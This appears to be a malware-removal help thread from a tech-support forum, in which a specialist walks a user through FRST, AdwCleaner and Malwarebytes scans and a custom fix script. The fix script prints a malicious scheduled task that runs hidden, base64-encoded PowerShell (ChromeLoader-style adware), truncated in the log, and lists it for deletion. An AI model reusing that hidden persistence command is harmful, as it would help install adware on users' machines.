Tech Support Guy banner
  • IMPORTANT: Only authorized members may reply to threads in this forum due to the complexity of the malware removal process. Authorized members include Malware Specialists and Trainees, Administrators, Moderators, and Trusted Advisors. Regular members are not permitted to reply, and any such posts will be deleted without notice or further explanation. Notice
1 - 15 of 15 Posts

·
Trusted Advisor & Malware Specialist
Joined
·
4,053 Posts
Hello.

In order to help us check your computer, please download and run FRST tool:

Download Farbar Recovery Scan Tool and save it to your desktop. --> IMPORTANT

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

If your antivirus software detects the tool as malicious, it’s safe to allow FRST to run. It is a false-positive detection.

If English is not your primary language, right click on FRST.exe/FRST64.exe and rename to FRSTEnglish.exe/FRST64English.exe
  • Double-click the FRST icon to run the tool. When the tool opens click Yes to disclaimer.
  • Press Scan button and wait for a while.
  • The scanner will produced two logs on your Desktop: FRST.txt and Addition.txt.
  • Please attach the content of these two logs in your next reply. If for any reason you can't attach a log, first zip it and then attach the zipped file.

Instructions on how to zip a file:
  • Locate the file or folder that you want to zip.
  • Press and hold (or right-click) the file or folder, select (or point to) Send to, and then select Compressed (zipped) folder. A new zipped folder with the same name is created in the same location.
 

·
Trusted Advisor & Malware Specialist
Joined
·
4,053 Posts
Hello, ptichun.

Thanks for your patience. I had to look into your logs very carefully. The computer is infected.

Please, adhere to the guidelines below, and then carefully follow, with the same order, all the instructions after:

1. Always ask before acting. Do not continue if you are not sure, or if something unexpected happens!

2. Do not run any tools unless instructed to do so. Also, do not uninstall or install any software during the procedure, unless I ask you to do so.

3. Cracked or pirated programs are not only illegal, but also can make your computer a malware target. Having such programs installed, is the easiest way to get infected. Thus, no need to clean the computer, since, soon or later, it will get infected again. If you have such programs, please uninstall them now, before we start the cleaning procedure.

4. If your computer seems to start working normally, don't abandon the topic. Even if your system is behaving normally, there may still be some malware remnants left over. Additionally, malware can re-infect the computer if some remnants are left. Therefore, please complete all requested steps to make sure any malware is successfully eradicated from your PC.

5. You have to reply to my posts within 3 days. If you need some additional time, just let me know. Otherwise, I will leave the topic due to lack of feedback. If you are able, I would request you to check this thread at least once per day so that we can resolve your issues effectively and efficiently.

6. Logs from malware diagnostic or removal programs can take some time to get analyzed. Also, have in mind that all the experts here are volunteers and may not be available to assist when you post. Please, be patient, while I analyze your logs.

==================

My first comments/instructions regarding your logs:

1. Uninstall a Chrome extension
  • Open Chrome.
  • At the top right choose More (the three vertical dots) > More Tools > Extensions
  • Find Ace Script, and remove it, clicking on Remove.
  • Confirm the action by clicking Remove once again.

2. Unknown PDF files?

Do you recognize these PDF files in your Downloads folder? If not, please delete them.

C:\Users\vladi\Downloads\ACFrOgAYXmQz4gTnmdIB7PFYcIQT8fVMHcC6ZiLCdlXqwMWb6VkXvTIwd1tlixlf7qiNxk55742VOUXWJbiBJ8mnBgF_dhX2ZvqQtoUbMdStdFv-kme0khXax_1EUUk=.pdf

C:\Users\vladi\Downloads\ACFrOgAl-l4e598r43llSUaajBlFYid4xjtpSjoJq3-7aH-piQaFR_esYmIsY_x_azns9H2ZPVMzjC1DHG3XFaC-L-futzkgW6h3uKBobOKOSpliO9SRFmH-PjfvEIMvCCN4yg5WdcmN6Qz92VUA.pdf


3. FRST

Please do the following to run a FRST fix.

NOTICE: This script was written specifically for this user. Running it on another machine may cause damage to your operating system
  • Select the entire contents of the code box below, from the "Start::" line to "End::", including both lines. Right-click and select "Copy ". No need to paste anything to anywhere.
Code:
Start::
CreateRestorePoint:
CloseProcesses:
CustomCLSID: HKU\S-1-5-21-1720742152-1034260963-3630301151-1001_Classes\CLSID\{CB965DF1-B8EA-49C7-BDAD-5457FDC1BF92}\InprocServer32 -> C:\Users\vladi\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20130.1\x64\Microsoft.Teams.AddinLoader.dll => No File
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} =>  -> No File
FirewallRules: [{480AEB4F-5A3B-418A-B4DB-60790B432ADC}] => (Allow) C:\Program Files (x86)\Anvsoft\Syncios\pdt_syncios.exe => No File
FirewallRules: [TCP Query User{9CD4A644-57D9-47AB-8EED-4FF4DE7EF1A9}C:\users\vladi\appdata\roaming\acestream\engine\ace_engine.exe] => (Block) C:\users\vladi\appdata\roaming\acestream\engine\ace_engine.exe => No File
FirewallRules: [UDP Query User{D4C643F1-B5EE-4DEA-A770-7CAE01F293C1}C:\users\vladi\appdata\roaming\acestream\engine\ace_engine.exe] => (Block) C:\users\vladi\appdata\roaming\acestream\engine\ace_engine.exe => No File
FirewallRules: [{EA949BDE-E23D-49F1-AFE3-7E71F43D01FE}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe => No File
FirewallRules: [{6129347F-A595-4183-84C9-EC16F241E180}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe => No File
FirewallRules: [TCP Query User{C7F82E7E-31D0-45CD-9B97-4C543CCE029C}C:\users\vladi\appdata\roaming\bloom\bloom.exe] => (Block) C:\users\vladi\appdata\roaming\bloom\bloom.exe => No File
FirewallRules: [UDP Query User{BA362647-739D-4A90-AD66-166933BE266C}C:\users\vladi\appdata\roaming\bloom\bloom.exe] => (Block) C:\users\vladi\appdata\roaming\bloom\bloom.exe => No File
FirewallRules: [TCP Query User{5AECFC5B-D830-4207-9F15-07DD4E844934}C:\users\vladi\appdata\roaming\bloom\bloom.exe] => (Block) C:\users\vladi\appdata\roaming\bloom\bloom.exe => No File
FirewallRules: [UDP Query User{22BD863D-039D-4B1D-BFD4-8D9D5768B1E4}C:\users\vladi\appdata\roaming\bloom\bloom.exe] => (Block) C:\users\vladi\appdata\roaming\bloom\bloom.exe => No File
HKLM\Software\...\Authentication\Credential Providers: [{C885AA15-1764-4293-B82A-0586ADD46B35}] ->
Task: {6CD22A28-8680-485E-A066-9BFD9A8E767A} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_AC => C:\WINDOWS\system32\MusNotification.exe /RunOnAC RebootDialog (No File)
Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => C:\WINDOWS\System32\MbaeParserTask.exe (No File)
Task: {E0F10DCF-44AD-40E8-9370-FB5DA59F93FB} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => C:\WINDOWS\system32\MusNotification.exe (No File)
Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found]
Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found]
Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found]
Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found]
FF HKU\S-1-5-21-1720742152-1034260963-3630301151-1001\...\Firefox\Extensions: [[email protected]] - C:\Users\vladi\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi
FF Extension: (Ace Script) - C:\Users\vladi\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi [2018-01-24]
CHR HKU\S-1-5-21-1720742152-1034260963-3630301151-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjbepbhonbojpoaenhckjocchgfiaofo]
Task: {37D0253A-124A-43D0-97FF-F540DDE131FE} - System32\Tasks\chrome customize => cmd /c powershell -WindowStyle Hidden -E "CgAKACQAdgBhAHIASgA9ACQAbgB1AGwAbAA7AAoACgAKACQAcABhAFIATQAgAD0AIAAiAFcAeQBJADMATwBUAFkAMABOAGoAWQAyAE0AegBrAHgATQBqAGsAMABOAEQASQB5AE0ARABVAGkATABEAEUAMgBOAEQAWQA0AE4AegBBAHkATwBEAEkAcwBJAGkASgBkACIAOwAKACQAbwBrAD0AJAB0AHIAdQBlAAoACgAKACQAVgBhAHIAXwBkACAAPQAgAC (the data entry has 5171 more characters). <==== ATTENTION
C:\Users\vladi\AppData\Roaming\Bloom
EmptyTemp:
End::
  • Right-click on FRST64 on your Desktop, to run it as administrator. When the tool opens, click "yes" to the disclaimer.
  • Press the Fix button once and wait.
  • FRST will process fixlist.txt
  • When finished, it will produce a log fixlog.txt on your Desktop.
  • Post the log in your next reply.

In your next reply please post:
  1. If you uninstalled the extension
  2. What did you do with the PDF files
  3. The fixlog.txt
 

·
Registered
Joined
·
241 Posts
Discussion Starter · #5 ·
Hello, ptichun.

Thanks for your patience. I had to look into your logs very carefully. The computer is infected.

Please, adhere to the guidelines below, and then carefully follow, with the same order, all the instructions after:

1. Always ask before acting. Do not continue if you are not sure, or if something unexpected happens!

2. Do not run any tools unless instructed to do so. Also, do not uninstall or install any software during the procedure, unless I ask you to do so.

3. Cracked or pirated programs are not only illegal, but also can make your computer a malware target. Having such programs installed, is the easiest way to get infected. Thus, no need to clean the computer, since, soon or later, it will get infected again. If you have such programs, please uninstall them now, before we start the cleaning procedure.

4. If your computer seems to start working normally, don't abandon the topic. Even if your system is behaving normally, there may still be some malware remnants left over. Additionally, malware can re-infect the computer if some remnants are left. Therefore, please complete all requested steps to make sure any malware is successfully eradicated from your PC.

5. You have to reply to my posts within 3 days. If you need some additional time, just let me know. Otherwise, I will leave the topic due to lack of feedback. If you are able, I would request you to check this thread at least once per day so that we can resolve your issues effectively and efficiently.

6. Logs from malware diagnostic or removal programs can take some time to get analyzed. Also, have in mind that all the experts here are volunteers and may not be available to assist when you post. Please, be patient, while I analyze your logs.

==================

My first comments/instructions regarding your logs:

1. Uninstall a Chrome extension
  • Open Chrome.
  • At the top right choose More (the three vertical dots) > More Tools > Extensions
  • Find Ace Script, and remove it, clicking on Remove.
  • Confirm the action by clicking Remove once again.

2. Unknown PDF files?

Do you recognize these PDF files in your Downloads folder? If not, please delete them.

C:\Users\vladi\Downloads\ACFrOgAYXmQz4gTnmdIB7PFYcIQT8fVMHcC6ZiLCdlXqwMWb6VkXvTIwd1tlixlf7qiNxk55742VOUXWJbiBJ8mnBgF_dhX2ZvqQtoUbMdStdFv-kme0khXax_1EUUk=.pdf

C:\Users\vladi\Downloads\ACFrOgAl-l4e598r43llSUaajBlFYid4xjtpSjoJq3-7aH-piQaFR_esYmIsY_x_azns9H2ZPVMzjC1DHG3XFaC-L-futzkgW6h3uKBobOKOSpliO9SRFmH-PjfvEIMvCCN4yg5WdcmN6Qz92VUA.pdf


3. FRST

Please do the following to run a FRST fix.

NOTICE: This script was written specifically for this user. Running it on another machine may cause damage to your operating system
  • Select the entire contents of the code box below, from the "Start::" line to "End::", including both lines. Right-click and select "Copy ". No need to paste anything to anywhere.
Code:
Start::
CreateRestorePoint:
CloseProcesses:
CustomCLSID: HKU\S-1-5-21-1720742152-1034260963-3630301151-1001_Classes\CLSID\{CB965DF1-B8EA-49C7-BDAD-5457FDC1BF92}\InprocServer32 -> C:\Users\vladi\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20130.1\x64\Microsoft.Teams.AddinLoader.dll => No File
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} =>  -> No File
FirewallRules: [{480AEB4F-5A3B-418A-B4DB-60790B432ADC}] => (Allow) C:\Program Files (x86)\Anvsoft\Syncios\pdt_syncios.exe => No File
FirewallRules: [TCP Query User{9CD4A644-57D9-47AB-8EED-4FF4DE7EF1A9}C:\users\vladi\appdata\roaming\acestream\engine\ace_engine.exe] => (Block) C:\users\vladi\appdata\roaming\acestream\engine\ace_engine.exe => No File
FirewallRules: [UDP Query User{D4C643F1-B5EE-4DEA-A770-7CAE01F293C1}C:\users\vladi\appdata\roaming\acestream\engine\ace_engine.exe] => (Block) C:\users\vladi\appdata\roaming\acestream\engine\ace_engine.exe => No File
FirewallRules: [{EA949BDE-E23D-49F1-AFE3-7E71F43D01FE}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe => No File
FirewallRules: [{6129347F-A595-4183-84C9-EC16F241E180}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe => No File
FirewallRules: [TCP Query User{C7F82E7E-31D0-45CD-9B97-4C543CCE029C}C:\users\vladi\appdata\roaming\bloom\bloom.exe] => (Block) C:\users\vladi\appdata\roaming\bloom\bloom.exe => No File
FirewallRules: [UDP Query User{BA362647-739D-4A90-AD66-166933BE266C}C:\users\vladi\appdata\roaming\bloom\bloom.exe] => (Block) C:\users\vladi\appdata\roaming\bloom\bloom.exe => No File
FirewallRules: [TCP Query User{5AECFC5B-D830-4207-9F15-07DD4E844934}C:\users\vladi\appdata\roaming\bloom\bloom.exe] => (Block) C:\users\vladi\appdata\roaming\bloom\bloom.exe => No File
FirewallRules: [UDP Query User{22BD863D-039D-4B1D-BFD4-8D9D5768B1E4}C:\users\vladi\appdata\roaming\bloom\bloom.exe] => (Block) C:\users\vladi\appdata\roaming\bloom\bloom.exe => No File
HKLM\Software\...\Authentication\Credential Providers: [{C885AA15-1764-4293-B82A-0586ADD46B35}] ->
Task: {6CD22A28-8680-485E-A066-9BFD9A8E767A} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_AC => C:\WINDOWS\system32\MusNotification.exe /RunOnAC RebootDialog (No File)
Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => C:\WINDOWS\System32\MbaeParserTask.exe (No File)
Task: {E0F10DCF-44AD-40E8-9370-FB5DA59F93FB} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => C:\WINDOWS\system32\MusNotification.exe (No File)
Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found]
Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found]
Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found]
Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found]
FF HKU\S-1-5-21-1720742152-1034260963-3630301151-1001\...\Firefox\Extensions: [[email protected]] - C:\Users\vladi\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi
FF Extension: (Ace Script) - C:\Users\vladi\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi [2018-01-24]
CHR HKU\S-1-5-21-1720742152-1034260963-3630301151-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjbepbhonbojpoaenhckjocchgfiaofo]
Task: {37D0253A-124A-43D0-97FF-F540DDE131FE} - System32\Tasks\chrome customize => cmd /c powershell -WindowStyle Hidden -E "CgAKACQAdgBhAHIASgA9ACQAbgB1AGwAbAA7AAoACgAKACQAcABhAFIATQAgAD0AIAAiAFcAeQBJADMATwBUAFkAMABOAGoAWQAyAE0AegBrAHgATQBqAGsAMABOAEQASQB5AE0ARABVAGkATABEAEUAMgBOAEQAWQA0AE4AegBBAHkATwBEAEkAcwBJAGkASgBkACIAOwAKACQAbwBrAD0AJAB0AHIAdQBlAAoACgAKACQAVgBhAHIAXwBkACAAPQAgAC (the data entry has 5171 more characters). <==== ATTENTION
C:\Users\vladi\AppData\Roaming\Bloom
EmptyTemp:
End::
  • Right-click on FRST64 on your Desktop, to run it as administrator. When the tool opens, click "yes" to the disclaimer.
  • Press the Fix button once and wait.
  • FRST will process fixlist.txt
  • When finished, it will produce a log fixlog.txt on your Desktop.
  • Post the log in your next reply.

In your next reply please post:
  1. If you uninstalled the extension
  2. What did you do with the PDF files
  3. The fixlog.txt
Hello, thank you for your help.

1. Extension has been installed according to your (however, chrome is still installed)
2. I deleted both PDF files successfully.
 

Attachments

·
Trusted Advisor & Malware Specialist
Joined
·
4,053 Posts
Hello, ptichun.

1. Extension has been installed according to your (however, chrome is still installed)
I guess, you uninstalled the extension successfully, right?

We didn't attempt to remove Chrome. Do you want to uninstall it?


1. Run AdwCleaner (scan only)

Download AdwCleaner and save it to your desktop.
  • Double click AdwCleaner.exe to run it.
  • Click Scan Now.
    • When the scan has finished, a Scan Results window will open.
    • Click Cancel (at this point do not attempt to Quarantine anything that is found)
  • Now click the Log Filestab.
    • Double click on the latest scan log (Scan logs have a [S0*] suffix, where * is replaced by a number. The latest scan will have the largest number)
    • A Notepad file will open containing the results of the scan.
    • Please post the contents of the file in your next reply.

2. Run Malwarebytes (scan only)
  • Download Malwarebytes and save it to your Desktop.
  • Once downloaded, close all programs and Windows on your computer.
  • Double-click on the icon on your desktop named MBSetup.exe. This will start the installation of MBAM onto your computer.
  • Follow the instructions to install the program.
  • When finished, double click the program's icon created on your Desktop.
  • Click the little gear on the top right (Settings) and when it opens, click the Security tab and make sure about the following:
    Code:
    Under the title Scan Options, all the options are checked.
    Under the title Windows Security Center (Premium only) the option is NOT checked.
    Under the title Potentially unwanted items all options are set to Always.
  • Click on the little gear to return to the main menu and select Scan. The program will start scanning your computer. This may take about 10 minutes, but in some cases it may be take longer.
  • When finished, you will see the Threat Scan Summary window open.
If threats are not found, click View Report and proceed to the two last steps below.

If threats are found, make sure that all threats are not selected, close the program and proceed to the next steps below.
  • Open Malwarebytes again, click on the Scanner, and then on the Reports tab.
  • Find the report with the most recent date and double click on it.
  • Click on Export and then Copy to Clipboard.
  • Paste its content here, in your next reply.

In your next reply, please post:
  1. The AdwCleaner[S0*].txt
  2. The Malwarebytes report
 

·
Registered
Joined
·
241 Posts
Discussion Starter · #8 ·
Hello, ptichun.



I guess, you uninstalled the extension successfully, right?

We didn't attempt to remove Chrome. Do you want to uninstall it?


1. Run AdwCleaner (scan only)

Download AdwCleaner and save it to your desktop.
  • Double click AdwCleaner.exe to run it.
  • Click Scan Now.
    • When the scan has finished, a Scan Results window will open.
    • Click Cancel (at this point do not attempt to Quarantine anything that is found)
  • Now click the Log Filestab.
    • Double click on the latest scan log (Scan logs have a [S0*] suffix, where * is replaced by a number. The latest scan will have the largest number)
    • A Notepad file will open containing the results of the scan.
    • Please post the contents of the file in your next reply.

2. Run Malwarebytes (scan only)
  • Download Malwarebytes and save it to your Desktop.
  • Once downloaded, close all programs and Windows on your computer.
  • Double-click on the icon on your desktop named MBSetup.exe. This will start the installation of MBAM onto your computer.
  • Follow the instructions to install the program.
  • When finished, double click the program's icon created on your Desktop.
  • Click the little gear on the top right (Settings) and when it opens, click the Security tab and make sure about the following:
    Code:
    Under the title Scan Options, all the options are checked.
    Under the title Windows Security Center (Premium only) the option is NOT checked.
    Under the title Potentially unwanted items all options are set to Always.
  • Click on the little gear to return to the main menu and select Scan. The program will start scanning your computer. This may take about 10 minutes, but in some cases it may be take longer.
  • When finished, you will see the Threat Scan Summary window open.
If threats are not found, click View Report and proceed to the two last steps below.

If threats are found, make sure that all threats are not selected, close the program and proceed to the next steps below.
  • Open Malwarebytes again, click on the Scanner, and then on the Reports tab.
  • Find the report with the most recent date and double click on it.
  • Click on Export and then Copy to Clipboard.
  • Paste its content here, in your next reply.

In your next reply, please post:
  1. The AdwCleaner[S0*].txt
  2. The Malwarebytes report
# -------------------------------
# Malwarebytes AdwCleaner 8.4.0.0
# -------------------------------
# Build: 08-30-2022
# Database: 2022-10-10.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Scan
# -------------------------------
# Start: 11-27-2022
# Duration: 00:00:19
# OS: Windows 11 (Build 22621.819)
# Scanned: 32094
# Detected: 38


* [ Services ] *

No malicious services found.

* [ Folders ] *

Adware.ChromeLoader C:\Users\vladi\AppData\Local\chrome_settings
PUP.Optional.Legacy C:\Users\vladi\AppData\LocalLow\.acestream
PUP.Optional.Legacy C:\Users\vladi\AppData\Roaming\.acestream
PUP.Optional.Legacy C:\Users\vladi\AppData\Roaming\acestream
PUP.Optional.Legacy C:\acestream_cache
PUP.Optional.Solvusoft C:\ProgramData\WinThruster

* [ Files ] *

No malicious files found.

* [ DLL ] *

No malicious DLLs found.

* [ WMI ] *

No malicious WMI found.

* [ Shortcuts ] *

No malicious shortcuts found.

* [ Tasks ] *

No malicious tasks found.

* [ Registry ] *

PUP.Optional.ASMagicPlayer HKCU\Software\Classes\acestream
PUP.Optional.AceStream HKCU\Software\RegisteredApplications|AceStream
PUP.Optional.Solvusoft HKLM\Software\Wow6432Node\WinThruster

* [ Chromium (and derivatives) ] *

No malicious Chromium entries found.

* [ Chromium URLs ] *

No malicious Chromium URLs found.

* [ Firefox (and derivatives) ] *

No malicious Firefox entries found.

* [ Firefox URLs ] *

No malicious Firefox URLs found.

* [ Hosts File Entries ] *

No malicious hosts file entries found.

* [ Preinstalled Software ] *

Preinstalled.HPAudioSwitch Folder C:\Program Files (x86)\HP\HPAUDIOSWITCH
Preinstalled.HPAudioSwitch Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AF867D35-EADE-4583-9EEA-51955CFADD17}
Preinstalled.HPAudioSwitch Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\HPAudioSwitch
Preinstalled.HPAudioSwitch Task C:\Windows\System32\Tasks\HPAUDIOSWITCH
Preinstalled.HPCleanFLC Registry HKCU\Software\Microsoft\Windows\CurrentVersion\Run|HPSEU_Host_Launcher
Preinstalled.HPCleanFLC Registry HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run|HPSEU_Host_Launcher
Preinstalled.HPCleanFLC Registry HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run|HPSEU_Host_Launcher
Preinstalled.HPRegistrationService Folder C:\ProgramData\HP\HP REGISTRATION SERVICE
Preinstalled.HPSupportAssistant Folder C:\HP\SUPPORT
Preinstalled.HPSupportAssistant Folder C:\Program Files (x86)\HEWLETT-PACKARD\HP SUPPORT FRAMEWORK
Preinstalled.HPSupportAssistant Folder C:\ProgramData\HEWLETT-PACKARD\HP SUPPORT FRAMEWORK
Preinstalled.HPSupportAssistant Folder C:\Users\vladi\AppData\Roaming\HEWLETT-PACKARD\HP SUPPORT FRAMEWORK
Preinstalled.HPSupportAssistant Registry HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{E76FD755-C1BA-4DCB-9F13-99BD91223ADE}
Preinstalled.HPSupportAssistant Registry HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E76FD755-C1BA-4DCB-9F13-99BD91223ADE}
Preinstalled.HPSupportAssistant Registry HKLM\Software\Classes\CLSID\{E76FD755-C1BA-4DCB-9F13-99BD91223ADE}
Preinstalled.HPSupportAssistant Registry HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E76FD755-C1BA-4DCB-9F13-99BD91223ADE}
Preinstalled.HPSupportAssistant Registry HKLM\Software\Wow6432Node\\Classes\CLSID\{E76FD755-C1BA-4DCB-9F13-99BD91223ADE}
Preinstalled.HPSupportAssistant Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E76FD755-C1BA-4DCB-9F13-99BD91223ADE}
Preinstalled.HPSureConnect Folder C:\Program Files\HPCOMMRECOVERY
Preinstalled.HPSureConnect Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{6468C4A5-E47E-405F-B675-A70A70983EA6}
Preinstalled.HPTouchpointAnalyticsClient Folder C:\ProgramData\HP\HP TOUCHPOINT ANALYTICS CLIENT
Preinstalled.HPTouchpointAnalyticsClient Registry HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{E5FB98E0-0784-44F0-8CEC-95CD4690C43F}
Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES
Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDTANGENT GAMES
Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDTANGENT GAMES\SHORTCUTPROVIDER
Preinstalled.WildTangentGamesBundle Folder C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WILDTANGENT GAMES
Preinstalled.WildTangentGamesBundle Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\WildTangent wildgames Master Uninstall
Preinstalled.WildTangentGamesBundle Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{80831F60-19D7-43B3-A60C-5CAF8C478DF6}
Preinstalled.WildTangentGamesBundle Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{A39303AB-4898-4F12-BAA0-0B8630F86DB4}



########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S00].txt ##########
 

·
Registered
Joined
·
241 Posts
Discussion Starter · #13 ·
The scan is done but when I try to copy to clipboard and paste the firefox gets stuck and I have to restart it. I tried saving a txt and attaching it but it still does not work?
What would you like me to do?
 

·
Trusted Advisor & Malware Specialist
Joined
·
4,053 Posts
Oh!!!

Many things are detected!!!

Let's clean!

1. AdwCleaner (Clean mode)

The findings in Folders and Registry parts of the log, are adware and PUPs which stands for Potentially Unwanted Programs. In the instructions below, I will list them all to be removed.

The section at the bottom under Preinstalled Software is software that was apparently installed when the device was new, which you may or may not use. Personally, I do not keep anything I don't use/need. But it's your computer, so your decision.

To proceed, please do the following:
  • Double click AdwCleaner.exe on your Desktop, to run it as you did before.
  • Click Scan Now.
  • When the scan has finished a Scan Results window will open.
  • Please check all the boxes and then click Quarantine.
  • Click Next.
    • If any pre-installed software was found on your machine, a prompt window will open. Click OK to close it.
    • Check any pre-installed software items you want to remove.
    • Click Quarantine.
  • A prompt to save your work will appear.
    • Click Continue when you're ready to proceed.
  • A prompt to restart your computer will appear.
    • Click Restart Now.
  • Once your computer has restarted:
    • If it doesn't open automatically, please start AdwCleaner.
    • Click the Log Files tab.
    • Double click on the latest Clean log (Clean logs have a [C0*] suffix, where * is replaced by a number, the latest scan will have the largest number)
    • A Notepad file will open containing the results of the removal.
    • Please post the contents of the file in your next reply.

2. Run Malwarebytes (Clean mode)
  • Double click the program's icon on your Desktop, as you did before.
  • Click the little gear on the top right (Settings) and when it opens, click the Security tab and make sure about the following:
    Code:
    Under the title Scan Options, all the options are checked.
    Under the title Windows Security Center (Premium only) the option is unchecked.
    Under the title Potentially unwanted items all options are set to Always.
  • Click on the little gear to return to the main menu and select Scan. The program will start scanning your computer. This may take about 10 minutes, but in some cases it may be take longer.
  • When finished, you will see the Thread Scan Summary window open.
  • If threats are not found, click View Report and proceed to the two last steps below.
  • If threats are found, make sure that all threats are selected, and click on Quarantine/Remove selected.
  • You may need to restart the computer.
  • Open Malwarebytes again, click on the Scanner, and then on the Reports tab.
  • Find the report with the most recent date and double click on it.
  • Click on Export and then Copy to Clipboard.
  • Paste its content here, in your next reply.

3. Eset Online Scan

Download ESET Online Scanner and save it to your desktop.
  • Right-click on esetonlinescanner_enu.exe and select Run as Administrator.
  • When the tool opens, click Get Started.
  • Read and accept the license agreement.
  • At the Welcome to ESET Online Scanner window, click Get Started.
  • Select whether you would like to send anonymous data to ESET.
  • Note: if you see the "Welcome Back to ESET Online Scanner" screen, click Computer Scan > Full Scan.
  • Click on the Full Scan option.
  • Select Enable ESET to detect and remove potentially unwanted applications, then click Start scan.
  • ESET will now begin scanning your computer. This may take some time.
  • When the scan is finished and if threats have been detected, select Save scan log. Save it to your desktop as eset.txt. Click on Continue.
  • ESET Online Scanner may ask if you'd like to turn on the Periodic Scan feature. Click on Continue.
  • On the next screen, you can leave feedback about the program if you wish. Check the box for Delete application data on closing. If you left feedback, click Submit and continue. If not, Close without feedback.
  • Open the scan log on your desktop (eset.txt) and copy and paste its contents into your next reply.


In your next reply, please post:
  1. The AdwCleaner[C0*].txt
  2. The Malwarebytes report
  3. The eset.txt
 
1 - 15 of 15 Posts
Top